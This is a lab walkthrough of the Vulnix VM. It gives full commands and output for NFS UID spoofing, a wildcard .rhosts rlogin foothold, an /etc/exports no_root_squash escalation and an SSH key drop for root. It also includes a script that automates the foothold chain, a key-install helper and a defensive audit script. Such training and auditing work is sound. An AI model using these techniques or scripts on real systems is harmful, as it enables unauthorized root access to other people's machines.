Vulnix Walkthrough (OSCP Prep)

Introduction
In this installment of the OSCP Prep series, we’ll take a look at Vulnix. HackLAB: Vulnix is an Ubuntu 12.04-based vulnerable VM which provides a large attack surface including some less-than-common services. To get in, we’ll enumerate its NFS exports and take advantage of how NFS trusts client-supplied user IDs, then chain that into a password-less rlogin.
Host Discovery
First, we need to locate the target on the network:
(ori0n@apophis) --> [ ~/vulnix ]
==> sudo arp-scan -l
[sudo] password for ori0n:
Interface: ens33, type: EN10MB, MAC: 00:0c:29:8d:fb:0b, IPv4: 10.0.10.10
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.10.1 00:50:56:c0:00:08 VMware, Inc.
10.0.10.2 00:50:56:fb:3b:27 VMware, Inc.
10.0.10.125 00:0c:29:cc:51:1c VMware, Inc.
10.0.10.199 00:50:56:e6:c4:aa VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.272 seconds (112.68 hosts/sec). 4 responded
We find the machine at 10.0.10.125. We can add the appropriate entry in /etc/hosts:
10.0.10.125 vulnix
Scanning
We need to map out our attack surface. Let’s run RustScan and tell it to run an Nmap version scan.
(ori0n@apophis) --> [ ~/vulnix ]
==> rustscan -a vulnix -- -sV -oA scans/nmap-version
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥
[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.10.125:79
Open 10.0.10.125:110
Open 10.0.10.125:111
Open 10.0.10.125:512
Open 10.0.10.125:513
Open 10.0.10.125:514
Open 10.0.10.125:993
Open 10.0.10.125:995
Open 10.0.10.125:2049
Open 10.0.10.125:34235
Open 10.0.10.125:38648
Open 10.0.10.125:41822
Open 10.0.10.125:53529
Open 10.0.10.125:53849
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-version" on ip 10.0.10.125
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-14 07:24 CDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 07:24
Scanning 10.0.10.125 [2 ports]
Completed Ping Scan at 07:24, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 07:24
Scanning vulnix (10.0.10.125) [14 ports]
Discovered open port 110/tcp on 10.0.10.125
Discovered open port 111/tcp on 10.0.10.125
Discovered open port 993/tcp on 10.0.10.125
Discovered open port 995/tcp on 10.0.10.125
Discovered open port 53529/tcp on 10.0.10.125
Discovered open port 41822/tcp on 10.0.10.125
Discovered open port 79/tcp on 10.0.10.125
Discovered open port 513/tcp on 10.0.10.125
Discovered open port 38648/tcp on 10.0.10.125
Discovered open port 34235/tcp on 10.0.10.125
Discovered open port 2049/tcp on 10.0.10.125
Discovered open port 512/tcp on 10.0.10.125
Discovered open port 514/tcp on 10.0.10.125
Discovered open port 53849/tcp on 10.0.10.125
Completed Connect Scan at 07:24, 0.00s elapsed (14 total ports)
Initiating Service scan at 07:24
Scanning 14 services on vulnix (10.0.10.125)
Completed Service scan at 07:24, 11.02s elapsed (14 services on 1 host)
NSE: Script scanning 10.0.10.125.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:24
Completed NSE at 07:24, 0.08s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:24
Completed NSE at 07:24, 0.01s elapsed
Nmap scan report for vulnix (10.0.10.125)
Host is up, received conn-refused (0.00053s latency).
Scanned at 2021-08-14 07:24:14 CDT for 11s
PORT STATE SERVICE REASON VERSION
79/tcp open finger syn-ack Linux fingerd
110/tcp open pop3 syn-ack Dovecot pop3d
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
512/tcp open exec syn-ack netkit-rsh rexecd
513/tcp open login syn-ack
514/tcp open tcpwrapped syn-ack
993/tcp open ssl/imap syn-ack Dovecot imapd
995/tcp open ssl/pop3 syn-ack Dovecot pop3d
2049/tcp open nfs_acl syn-ack 2-3 (RPC #100227)
34235/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
38648/tcp open mountd syn-ack 1-3 (RPC #100005)
41822/tcp open mountd syn-ack 1-3 (RPC #100005)
53529/tcp open status syn-ack 1 (RPC #100024)
53849/tcp open mountd syn-ack 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.55 seconds
There is a lot here. The services that immediately catch my eye are the mountd daemons (NFS) and the Berkeley r-services on 512-514: rexec, rlogin and, behind the tcpwrapped 514/tcp, presumably rsh. Let’s start with mountd.
NFS
The mountd service suggests the system is exporting NFS shares. We should query the export list to see if there is anything worth mounting.
(ori0n@apophis) --> [ ~/vulnix ]
==> showmount -e vulnix
Export list for vulnix:
/home/vulnix *
So it would appear we have a user vulnix whose home directory is exported, and the * means any host may mount it. Let’s mount it and check it out.
(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
==> sudo mount.nfs -o vers=2 vulnix:/home/vulnix ./home/vulnix
[sudo] password for ori0n:
(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
==> cd home/vulnix
cd: permission denied: home/vulnix
(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
==> stat home/vulnix
File: home/vulnix
Size: 4096 Blocks: 8 IO Block: 8192 directory
Device: 36h/54d Inode: 32917 Links: 2
Access: (0750/drwxr-x---) Uid: ( 2008/ vulnix) Gid: ( 2008/ vulnix)
Access: 2012-09-02 13:25:05.255399000 -0500
Modify: 2012-09-02 13:25:02.599394000 -0500
Change: 2012-09-02 13:25:02.599394000 -0500
Birth: -
It mounted successfully, but we don’t have permission to enter the directory: it is mode 0750 and owned by UID 2008. That is not a real barrier. With the default AUTH_SYS security flavour, NFS does not authenticate users; the server trusts whatever numeric UID and GID the client presents, and by default only UID 0 is remapped (root_squash). The stat output shows that the vulnix user has UID 2008, so a local account with the same UID will be treated as the owner on the share. Let’s add one and try again.
(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
==> sudo useradd -u2008 vulnix
(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
==> sudo su vulnix
[vulnix@apophis nfs]$ cd home/vulnix
[vulnix@apophis vulnix]$ ls -al
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 .
drwxr-xr-x 3 ori0n ori0n 4096 Aug 14 05:30 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
There isn’t much useful here, but surely we can do something with this access.
Getting a Foothold with rlogin
We noticed from the port scan that the rlogin service is running on the machine. rlogind consults ~/.rhosts for the target account and lets any host/user pair listed there in without a password, so if we drop an .rhosts file in this user’s home directory we should get a shell. Two details matter: the entry + + trusts every host and every user (in a shared lab, list only your own address and username instead), and the file must be owned by the account and must not be group- or world-writable, or rlogind ignores it, so we set it to 0644.
[vulnix@apophis vulnix]$ echo + + > .rhosts
[vulnix@apophis vulnix]$ cat .rhosts
+ +
[vulnix@apophis vulnix]$ chmod 644 .rhosts
[vulnix@apophis vulnix]$ ls -al
total 24
drwxr-x--- 2 vulnix vulnix 4096 Aug 14 07:40 .
drwxr-xr-x 3 ori0n ori0n 4096 Aug 14 05:30 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
-rw-r--r-- 1 vulnix vulnix 4 Aug 14 07:40 .rhosts
Now, from another terminal, we try to log in.
(ori0n@apophis) --> [ ~/vulnix ]
==> rlogin -l vulnix vulnix
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Sat Aug 14 13:41:49 BST 2021
System load: 0.0 Processes: 89
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 6% IP address for eth0: 10.0.10.125
Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
Sweet! Now, how about root?
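The whole foothold chain from this section (mount the export, match the owner’s UID locally, drop .rhosts as that user, rlogin) as one script. This is an added example, not code from the walkthrough or from the Vulnix VM; the script name rhosts_via_nfs.sh, the nfs_uid_<N> account naming and the argument order are my own choices. It writes a single host/user trust line rather than the + + used above, and assumes a Linux attacker host with GNU coreutils, nfs-common (mount.nfs) and rsh-client, run as root.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: the foothold chain as
# one script. Mounts the export, creates a local account whose UID matches the
# export's owner (NFS AUTH_SYS trusts the UID the client presents; only UID 0
# is remapped by root_squash), drops a .rhosts trust line as that user, and
# prints the rlogin command to run. Assumes a Linux attacker host with GNU
# coreutils, nfs-common (mount.nfs) and rsh-client, executed as root.
#
#   usage: ./rhosts_via_nfs.sh SERVER:/EXPORT MNT REMOTE_USER MY_IP MY_USER
#   e.g.   ./rhosts_via_nfs.sh vulnix:/home/vulnix /mnt/vulnix vulnix 10.0.10.10 ori0n
set -eu

# owner_uid_gid PATH -> "uid gid" of PATH's owner, e.g. "2008 2008".
owner_uid_gid() {
    stat -c '%u %g' "$1"
}

# ensure_local_uid UID GID NAME -> prints a local username mapped to UID,
# creating NAME (and a group for GID) if the UID is not yet taken locally.
ensure_local_uid() {
    uid=$1; gid=$2; name=$3
    existing=$(getent passwd "$uid" | cut -d: -f1)
    if [ -n "$existing" ]; then
        printf '%s\n' "$existing"
        return 0
    fi
    getent group "$gid" >/dev/null 2>&1 || groupadd -g "$gid" "$name"
    useradd -u "$uid" -g "$gid" -M -s /bin/sh "$name"
    printf '%s\n' "$name"
}

# write_rhosts DIR HOST USER -> writes "HOST USER" as DIR/.rhosts, mode 0644,
# and prints the resulting mode. rlogind ignores a .rhosts that is group- or
# world-writable or not owned by the account, so this must run as the matched
# UID (the NFS server then records that UID as the file's owner). Trusting one
# host and user rather than "+ +" avoids opening the target to everyone else.
write_rhosts() {
    dir=$1; host=$2; user=$3
    printf '%s %s\n' "$host" "$user" > "$dir/.rhosts"
    chmod 0644 "$dir/.rhosts"
    stat -c '%a' "$dir/.rhosts"
}

main() {
    if [ "$1" = rhosts ]; then             # re-entered under su as the matched user
        write_rhosts "$2" "$3" "$4" >/dev/null
        return 0
    fi
    export_spec=$1; mnt=$2; remote_user=$3; my_ip=$4; my_user=$5
    server=${export_spec%%:*}
    mkdir -p "$mnt"
    mount.nfs -o vers=2 "$export_spec" "$mnt"   # vers=2 as in the walkthrough; drop it on newer servers
    set -- $(owner_uid_gid "$mnt")              # -> $1=uid $2=gid of the export root
    local_user=$(ensure_local_uid "$1" "$2" "nfs_uid_$1")
    # Re-execute this script as the matched user so the write carries UID $1.
    # The script file must therefore be readable by that account.
    su -s /bin/sh "$local_user" -c "sh '$0' rhosts '$mnt' '$my_ip' '$my_user'"
    echo "Trust line installed. From $my_ip as $my_user, run:  rlogin -l $remote_user $server"
}

if [ $# -gt 0 ]; then
    main "$@"
fi
```

The mount and useradd steps need root on the attacker box, but the .rhosts write deliberately does not run as root: with the server’s default root_squash, root’s write would be remapped to the anonymous user and bounce off the 0750 directory.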
Privesc
With shell access in hand, let’s aim for root. Let’s see if our user has any interesting privileges.
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
Interesting… we have the ability to edit /etc/exports, the file that defines NFS shares. If we export the /root directory with no_root_squash, the server stops remapping a client’s UID 0 to the anonymous user, so mounting that export as root on our own machine gives us root’s access to its contents.
vulnix@vulnix:~$ SUDO_EDITOR=vim sudoedit /etc/exports
Add the following line (the option list must contain no whitespace; exportfs splits the line on spaces and would treat the two halves of "rw, no_root_squash" as separate, invalid entries):
/root *(rw,no_root_squash)
In order for this configuration to take effect, the NFS server has to re-read /etc/exports, and the sudoers entry only grants sudoedit on that file, not exportfs or control of the service. I could not figure out a way to do this without simply rebooting the VM from within VMware, and according to the author’s own writeup, this is the intended solution. Don’t forget to unmount the mounted share before doing so.
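Seen from the defender’s side, everything this box hands out lives in two text files: the world-mountable export and the no_root_squash entry in /etc/exports, and the wildcard trust line in .rhosts. The audit helper below is an added example, not part of the walkthrough or of the Vulnix VM. It is plain POSIX sh plus awk; the finding names and the sample files are mine, and the sample entries are constructed here to mirror what we saw on this box, including the whitespace-broken variant of the exports line.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): audit /etc/exports and a
# user's .rhosts for the weaknesses this box relies on. POSIX sh + awk only;
# the sample inputs below are constructed, not copied from a real host.
set -eu

# audit_exports FILE -> one tab-separated finding per line: PATH CLIENT FINDING
#   WILDCARD_HOST      client is "*" or missing, i.e. exported to every host
#   NO_ROOT_SQUASH     a remote root keeps UID 0 on the export
#   MALFORMED_OPTIONS  a token with an unmatched parenthesis, which is what
#                      "*(rw, no_root_squash)" turns into after field splitting
audit_exports() {
    awk '
    /^[[:space:]]*(#|$)/ { next }                       # comments and blank lines
    {
        path = $1
        if (NF == 1) { printf "%s\t-\tWILDCARD_HOST\n", path; next }
        for (i = 2; i <= NF; i++) {
            tok = $i
            has_open  = (index(tok, "(") > 0)
            has_close = (index(tok, ")") > 0)
            if (has_open != has_close) {
                printf "%s\t%s\tMALFORMED_OPTIONS\n", path, tok
                continue
            }
            host = tok; opts = ""
            if (has_open) {
                p = index(tok, "(")
                host = substr(tok, 1, p - 1)
                opts = substr(tok, p + 1, length(tok) - p - 1)
            }
            if (host == "*" || host == "")               # "/path (rw)" also means every host
                printf "%s\t%s\tWILDCARD_HOST\n", path, tok
            n = split(opts, o, ",")
            for (j = 1; j <= n; j++)
                if (o[j] == "no_root_squash")
                    printf "%s\t%s\tNO_ROOT_SQUASH\n", path, tok
        }
    }' "$1"
}

# audit_rhosts FILE -> flags "host [user]" lines where either field is "+",
# the wildcard that makes rlogind accept any host or any user.
audit_rhosts() {
    awk '
    /^[[:space:]]*(#|$)/ { next }
    $1 == "+"            { printf "%d\tANY_HOST\t%s\n", NR, $0 }
    NF >= 2 && $2 == "+" { printf "%d\tANY_USER\t%s\n", NR, $0 }
    ' "$1"
}

# sample_exports -> path to a constructed exports file: the two Vulnix-style
# entries, a sane one, and the whitespace-broken variant.
sample_exports() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample, not copied from a real host
/home/vulnix *
/root *(rw,no_root_squash)
/srv/pub 10.0.10.0/24(ro)
/root *(rw, no_root_squash)
EOF
    printf '%s\n' "$f"
}

# sample_rhosts -> path to a constructed .rhosts with one wildcard line.
sample_rhosts() {
    f=$(mktemp)
    printf '+ +\n10.0.10.10 ori0n\n' > "$f"
    printf '%s\n' "$f"
}

# usage: ./audit_nfs_rhosts.sh /etc/exports [/home/user/.rhosts]
if [ $# -gt 0 ]; then
    audit_exports "$1"
    if [ $# -gt 1 ]; then
        audit_rhosts "$2"
    fi
fi
```

Run against the sample, the exports audit reports two WILDCARD_HOST findings, one NO_ROOT_SQUASH and two MALFORMED_OPTIONS (one for each half of the space-separated option list), and nothing for the /srv/pub line; the .rhosts audit reports both ANY_HOST and ANY_USER for the + + line.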
Capture the Flag
After the box has rebooted, we’ll mount the share we added and read the flag.
[ apophis /home/ori0n/vulnix/files/nfs ]# mount.nfs -o vers=2 vulnix:/root root
[ apophis /home/ori0n/vulnix/files/nfs ]# cd root
[ apophis /home/ori0n/vulnix/files/nfs/root ]# ls
trophy.txt
[ apophis /home/ori0n/vulnix/files/nfs/root ]# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
And we have the flag!
Getting a root Shell
So we’ve got the flag, but we don’t have shell access as root. How can we get in? Note that 22/tcp did not appear in the RustScan output above even though SSH answers below; fast scanners can drop ports, so a follow-up full-range Nmap scan is worth the time. Let’s see if this thing allows root to log in over SSH.
vulnix@vulnix:~$ grep PermitRootLogin /etc/ssh/sshd_config
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".
Looks like it does. We can add our SSH key from our local ~/.ssh/id_rsa.pub to the remote’s /root/.ssh/authorized_keys. Because the export has no_root_squash, the files we create as root through the mount are owned by UID 0 on the server, which is exactly what sshd expects for root’s authorized_keys; with StrictModes (the default) the directory and file must also not be group- or world-writable, which root’s default umask takes care of here.
[ apophis /home/ori0n/vulnix/files/nfs/root ]# mkdir .ssh
[ apophis /home/ori0n/vulnix/files/nfs/root ]# cd .ssh
[ apophis /home/ori0n/vulnix/files/nfs/root/.ssh ]# cp ~ori0n/.ssh/id_rsa.pub authorized_keys
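The same key drop as a reusable function that sets the modes sshd’s StrictModes wants explicitly, appends rather than overwrites (so an existing authorized_keys is not clobbered), and reports the owner UID the server recorded, which is the direct check that no_root_squash took effect. This is an added example, not code from the walkthrough or the Vulnix VM; the function names and the output format are my own, and the test key used when it runs stand-alone is a constructed placeholder, not a real key. It assumes GNU coreutils (stat -c).

```shell
#!/bin/sh
# Added example (not from the original walkthrough): install an SSH public key
# into a root home reached through a no_root_squash NFS mount, with the
# ownership and modes sshd's StrictModes insists on, and confirm the server
# kept us as UID 0. Assumes GNU coreutils (stat -c).
set -eu

# install_authorized_key HOME_DIR PUBKEY_FILE
#   Creates HOME_DIR/.ssh (0700) and appends the key in PUBKEY_FILE to
#   authorized_keys (0600) unless an identical line is already present.
#   Prints "owner=U mode=M keys=N": U is the UID the server recorded for the
#   file (0 only if root was not squashed), M the file mode, N the key count.
install_authorized_key() {
    home=$1; pub=$2
    ssh_dir=$home/.ssh
    auth=$ssh_dir/authorized_keys
    key=$(head -n 1 "$pub")            # a public key file is one line
    mkdir -p "$ssh_dir"
    chmod 0700 "$ssh_dir"
    touch "$auth"
    if ! grep -qxF -- "$key" "$auth"; then
        printf '%s\n' "$key" >> "$auth"
    fi
    chmod 0600 "$auth"
    printf 'owner=%s mode=%s keys=%s\n' \
        "$(stat -c %u "$auth")" "$(stat -c %a "$auth")" "$(grep -c . "$auth")"
}

# usage: ./install_root_key.sh /path/to/mounted/root ~/.ssh/id_rsa.pub
if [ $# -eq 2 ]; then
    out=$(install_authorized_key "$1" "$2")
    echo "$out"
    case $out in
        owner=0\ *) echo "file is owned by UID 0 on the server: no_root_squash is in effect" ;;
        *)          echo "WARNING: not owned by UID 0, root was squashed; sshd will not accept this key" >&2
                    exit 1 ;;
    esac
fi
```

Calling it twice with the same key leaves a single authorized_keys line, and the owner check is what distinguishes a working no_root_squash export from one where root is still mapped to the anonymous user and the file would belong to nobody.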
Now let’s try to SSH in as root:
(ori0n@apophis) --> [ ~/vulnix/files/nfs ]
==> ssh root@vulnix
Enter passphrase for key '/home/ori0n/.ssh/id_rsa':
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Sat Aug 14 14:11:59 BST 2021
System load: 0.0 Processes: 93
Usage of /: 90.2% of 773MB Users logged in: 1
Memory usage: 9% IP address for eth0: 10.0.10.125
Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)
Bingo!
Wrapping Up
There you have it: root on Vulnix. This was an interesting box. As a nice change of pace, it didn’t include a web server and did include a number of services we haven’t yet encountered in this series. Manually rebooting the VM to get the NFS configuration changes to take effect seemed a bit cheap, but if it’s good enough for the author, it’s good enough for me.